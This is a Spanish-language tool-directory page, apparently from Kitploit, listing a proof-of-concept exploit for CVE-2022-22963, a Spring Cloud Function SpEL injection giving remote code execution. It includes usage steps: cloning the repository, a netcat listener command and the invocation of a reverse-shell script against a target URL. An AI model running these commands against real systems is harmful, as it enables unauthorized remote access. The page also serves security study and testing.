Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22963 — Exploit de prueba de concepto para CVE-2022-22963, una inyección SpEL en Spring Cloud Function que conduce a la ejecución remota de código. Incluye un script de shell para explotación automatizada con payload de reverse shell. | Kitploit
Herramientas/GitHubGitHub/jrbh4ck/cve-2022-22963
ExplotaciónShellcodeExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubjrbh4ck/cve-2022-22963

CVE-2022-22963

Exploit de prueba de concepto para CVE-2022-22963, una inyección SpEL en Spring Cloud Function que conduce a la ejecución remota de código. Incluye un script de shell para explotación automatizada con payload de reverse shell.

Ver Repositorio
12hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-22963

En las versiones 3.1.6, 3.2.2 y versiones anteriores de Spring Cloud Function, al utilizar la funcionalidad de enrutamiento es posible que un usuario proporcione un SpEL especialmente diseñado como una expresión de enrutamiento que puede resultar en la ejecución remota de código y el acceso a recursos locales.

PoC

Clona el repositorio

root@kitploit:~
git clone https://github.com/jrbH4CK/CVE-2022-22963.git

Ingresa a la carpeta

root@kitploit:~
cd CVE-2022-22963

Cambia los permisos de ejecución

root@kitploit:~
chmode +x springCloud.sh

Inicia nc por el puerto deseado

root@kitploit:~
nc -nlvp 4444

Ejecuta el comando siguiente cambiando los parametros de acuerdo a tus necesidades

root@kitploit:~
./springCloud.sh url lhost lport

NOTA: El uso de este repositorio es responsabilidad de quien lo utiliza y no del autor, solo con fines educativos.

Descargar herramienta